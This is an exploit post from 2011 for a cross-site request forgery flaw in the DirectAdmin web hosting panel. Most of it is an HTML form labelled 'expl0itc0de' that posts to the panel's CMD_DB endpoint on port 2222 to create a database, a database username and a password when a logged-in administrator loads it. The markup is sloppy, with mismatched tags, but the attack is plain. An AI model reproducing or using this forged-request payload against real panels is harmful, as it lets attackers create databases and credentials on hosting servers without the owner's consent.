<------------------- header data start ------------------- >
#############################################################
DirectAdmin Web Panel XSRF Açigi
#############################################################

# Author : SENCER HAN

# Date : 11.07.2011

# Name : DirectAdmin Web Panel

# Bug Type : XSRF Vulnerability

expl0itc0de :
<codehunters>
<form name=reseller action=http://site.com:2222/CMD_DB method=post>
<input type=hidden name=action value=create>

<tr><td class=list>Database Name:</td><td class=list><b></b><input type=text name=name size=12></td></tr>
<tr><td class=list>Database Username:</td><td class=list><b></b><input type=text name=user size=12>
<tr><td class=list>Username Password:</td><td class=list><input type=password name=passwd size=20> <input type=button value=Random onClick=randomPass()></td></tr>
<tr><td class=list>Confirm Password:</td><td class=list><input type=password name=passwd2 size=20></td></tr>

<input type=submit name=create value=Create>
</td></tr>
</form>
</codehunter>
</table>
#############################################################